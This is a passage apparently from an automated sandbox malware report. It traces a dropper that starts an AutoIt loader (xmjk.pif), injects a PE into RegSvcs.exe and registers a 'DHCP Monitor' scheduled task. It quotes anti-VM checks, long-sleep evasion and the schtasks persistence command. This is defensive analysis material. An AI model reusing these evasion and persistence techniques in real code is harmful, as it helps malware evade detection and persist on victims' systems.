        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\31956653\xmjk.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\31956653\xmjk.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\31956653\xmjk.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\31956653\xmjk.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\31956653\xmjk.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\31956653\xmjk.pifProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        barindex
        Yara detected AntiVM autoit scriptShow sources
        Source: Yara matchFile source: Process Memory Space: xmjk.pif PID: 6660, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: xmjk.pif PID: 4356, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: xmjk.pif PID: 3412, type: MEMORYSTR
        Source: C:\Users\user\31956653\xmjk.pif TID: 4620Thread sleep count: 59 > 30Jump to behavior
        Source: C:\Users\user\31956653\xmjk.pif TID: 4620Thread sleep count: 120 > 30Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6060Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\31956653\xmjk.pif TID: 4520Thread sleep count: 66 > 30Jump to behavior
        Source: C:\Users\user\31956653\xmjk.pif TID: 4520Thread sleep count: 113 > 30Jump to behavior
        Source: C:\Users\user\31956653\xmjk.pif TID: 6340Thread sleep count: 64 > 30
        Source: C:\Users\user\31956653\xmjk.pif TID: 6340Thread sleep count: 105 > 30
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeWindow / User API: threadDelayed 2391Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeWindow / User API: threadDelayed 7014Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeWindow / User API: foregroundWindowGot 624Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
        Source: xmjk.pif, 0000001B.00000003.419735633.00000000004E1000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then
        Source: xmjk.pif, 00000014.00000003.400055049.0000000003DFB000.00000004.00000001.sdmpBinary or memory string: VMwareService.exe59767
        Source: xmjk.pif, 00000014.00000003.399966022.0000000003DE5000.00000004.00000001.sdmpBinary or memory string: rocessExists("VboxService.exe") Then
        Source: xmjk.pif, 0000001B.00000003.421265433.00000000004E5000.00000004.00000001.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then7s2
        Source: xmjk.pif, 0000001B.00000003.426696174.0000000000509000.00000004.00000001.sdmpBinary or memory string: VMwareUser.exe\Microso
        Source: xmjk.pif, 00000014.00000003.400055049.0000000003DFB000.00000004.00000001.sdmpBinary or memory string: VMwareUser.exe5FB536C7
        Source: xmjk.pif, 0000001B.00000003.421265433.00000000004E5000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VMwaretray.exe") Then
        Source: xmjk.pif, 00000014.00000003.399551855.0000000003DE1000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VMwaretray.exe") ThenR
        Source: xmjk.pif, 00000004.00000003.358349289.00000000036C9000.00000004.00000001.sdmpBinary or memory string: VBoxTray.exeGL5
        Source: xmjk.pif, 00000014.00000003.400055049.0000000003DFB000.00000004.00000001.sdmpBinary or memory string: VBoxTray.exe`i
        Source: xmjk.pif, 0000001B.00000003.426696174.0000000000509000.00000004.00000001.sdmpBinary or memory string: VMwareService.exe8
        Source: xmjk.pif, 0000001B.00000003.419735633.00000000004E1000.00000004.00000001.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then58)
        Source: xmjk.pif, 00000004.00000003.358349289.00000000036C9000.00000004.00000001.sdmpBinary or memory string: VMwaretray.exe[N
        Source: xmjk.pif, 00000014.00000003.399966022.0000000003DE5000.00000004.00000001.sdmp, xmjk.pif, 0000001B.00000003.421265433.00000000004E5000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") ThendJ
        Source: xmjk.pif, 0000001B.00000003.426696174.0000000000509000.00000004.00000001.sdmpBinary or memory string: VMwaretray.exe
        Source: xmjk.pif, 0000001B.00000003.419735633.00000000004E1000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") ThendJ7
        Source: xmjk.pif, 0000001B.00000003.421265433.00000000004E5000.00000004.00000001.sdmpBinary or memory string: nXHMNrocessExists("VboxService.exe") Then
        Source: xmjk.pif, 00000004.00000003.342061391.0000000003691000.00000004.00000001.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then1S6
        Source: RegSvcs.exe, 00000006.00000003.460013328.00000000013E0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
        Source: xmjk.pif, 00000004.00000003.358349289.00000000036C9000.00000004.00000001.sdmpBinary or memory string: VMwareService.exe536C7
        Source: xmjk.pif, 00000014.00000003.400055049.0000000003DFB000.00000004.00000001.sdmpBinary or memory string: VboxService.exeEi
        Source: xmjk.pif, 0000001B.00000003.426696174.0000000000509000.00000004.00000001.sdmpBinary or memory string: VBoxTray.exe
        Source: xmjk.pif, 00000004.00000003.342061391.0000000003691000.00000004.00000001.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenQ
        Source: xmjk.pif, 0000001B.00000003.421265433.00000000004E5000.00000004.00000001.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then58
        Source: xmjk.pif, 0000001B.00000003.419735633.00000000004E1000.00000004.00000001.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then7s2;
        Source: xmjk.pif, 00000004.00000003.358349289.00000000036C9000.00000004.00000001.sdmpBinary or memory string: VboxService.exeFN4
        Source: xmjk.pif, 0000001B.00000003.426696174.0000000000509000.00000004.00000001.sdmpBinary or memory string: VboxService.exe
        Source: xmjk.pif, 00000004.00000003.358349289.00000000036C9000.00000004.00000001.sdmpBinary or memory string: VMwareUser.exeGM
        Source: xmjk.pif, 00000004.00000003.342061391.0000000003691000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") ThenaF
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CBD353 VirtualQuery,GetSystemInfo,0_2_00CBD353
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CAA2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00CAA2DF
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CC9FD3 FindFirstFileExA,0_2_00CC9FD3
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CBAFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00CBAFB9
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_0042399B GetFileAttributesW,FindFirstFileW,FindClose,4_2_0042399B
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_0043BCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,4_2_0043BCB3
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_00442408 FindFirstFileW,Sleep,FindNextFileW,FindClose,4_2_00442408
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_0043280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_0043280D
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_00421A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_00421A73
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_0043BF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_0043BF17
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_00442408 FindFirstFileW,Sleep,FindNextFileW,FindClose,13_2_00442408
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_00468877 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,13_2_00468877
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0043280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_0043280D
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0042399B GetFileAttributesW,FindFirstFileW,FindClose,13_2_0042399B
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_00421A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00421A73
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0044CAE7 FindFirstFileW,FindNextFileW,FindClose,13_2_0044CAE7
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0043BCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,13_2_0043BCB3
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0044DE7C FindFirstFileW,FindClose,13_2_0044DE7C
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0043BF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_0043BF17
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_003FEE30 LoadLibraryA,GetProcAddress,4_2_003FEE30
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CC6AF3 mov eax, dword ptr fs:[00000030h]0_2_00CC6AF3
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CBE4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CBE4F5
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CCACA1 GetProcessHeap,0_2_00CCACA1
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_0044A35D BlockInput,4_2_0044A35D
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CBE643 SetUnhandledExceptionFilter,0_2_00CBE643
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CBE4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CBE4F5
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CBE7FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00CBE7FB
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CC7BE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CC7BE1
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_0040A128 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040A128
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_00407CCD _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00407CCD
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0040F170 SetUnhandledExceptionFilter,13_2_0040F170
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0040A128 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_0040A128
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_00407CCD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00407CCD

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Allocates memory in foreign processesShow sources
        Source: C:\Users\user\31956653\xmjk.pifMemory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: B00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\31956653\xmjk.pifMemory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: BC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\31956653\xmjk.pifMemory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 750000 protect: page execute and read and write
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\user\31956653\xmjk.pifMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: B00000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\31956653\xmjk.pifMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: BC0000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\31956653\xmjk.pifMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 750000 value starts with: 4D5A
        Writes to foreign memory regionsShow sources
        Source: C:\Users\user\31956653\xmjk.pifMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: B00000Jump to behavior
        Source: C:\Users\user\31956653\xmjk.pifMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 898000Jump to behavior
        Source: C:\Users\user\31956653\xmjk.pifMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: BC0000Jump to behavior
        Source: C:\Users\user\31956653\xmjk.pifMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 89E000Jump to behavior
        Source: C:\Users\user\31956653\xmjk.pifMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 750000
        Source: C:\Users\user\31956653\xmjk.pifMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 424000
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_004243FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,4_2_004243FF
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeProcess created: C:\Users\user\31956653\xmjk.pif 'C:\Users\user\31956653\xmjk.pif' thjfdg.xcpJump to behavior
        Source: C:\Users\user\31956653\xmjk.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp7982.tmp'Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7CDE.tmp'Jump to behavior
        Source: C:\Users\user\31956653\xmjk.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\31956653\xmjk.pif 'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcpJump to behavior
        Source: C:\Users\user\31956653\xmjk.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_00426C61 LogonUserW,4_2_00426C61
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_003FD7A0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,4_2_003FD7A0
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_00423321 __wcsicoll,mouse_event,__wcsicoll,mouse_event,4_2_00423321
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_0043602A GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,4_2_0043602A
        Source: xmjk.pif, 00000004.00000003.358349289.00000000036C9000.00000004.00000001.sdmp, RegSvcs.exe, 00000006.00000002.581184537.000000000665B000.00000004.00000001.sdmp, xmjk.pif, 00000014.00000003.400055049.0000000003DFB000.00000004.00000001.sdmp, xmjk.pif, 0000001B.00000003.426696174.0000000000509000.00000004.00000001.sdmpBinary or memory string: Program Manager
        Source: xmjk.pifBinary or memory string: Shell_TrayWnd
        Source: RegSvcs.exe, 00000006.00000002.575911182.00000000018A0000.00000002.00020000.sdmpBinary or memory string: Progman
        Source: xmjk.pif, 0000001B.00000003.419735633.00000000004E1000.00000004.00000001.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then6
        Source: xmjk.pif, 00000004.00000003.342061391.0000000003691000.00000004.00000001.sdmp, xmjk.pif, 00000014.00000003.399966022.0000000003DE5000.00000004.00000001.sdmp, xmjk.pif, 0000001B.00000003.421265433.00000000004E5000.00000004.00000001.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then
        Source: RegSvcs.exe, 00000006.00000002.575911182.00000000018A0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
        Source: xmjk.pif, 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp, xmjk.pif, 0000000D.00000002.366781987.0000000000472000.00000002.00020000.sdmp, xmjk.pif, 00000014.00000000.372469272.0000000000472000.00000002.00020000.sdmp, xmjk.pif, 00000016.00000000.390599196.0000000000472000.00000002.00020000.sdmp, xmjk.pif, 0000001B.00000000.396587647.0000000000472000.00000002.00020000.sdmpBinary or memory string: ICASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript PausedblankinfoquestionstopwarningAutoIt -
        Source: RegSvcs.exe, 00000006.00000002.576824260.0000000002F66000.00000004.00000001.sdmpBinary or memory string: Program Manager\2z
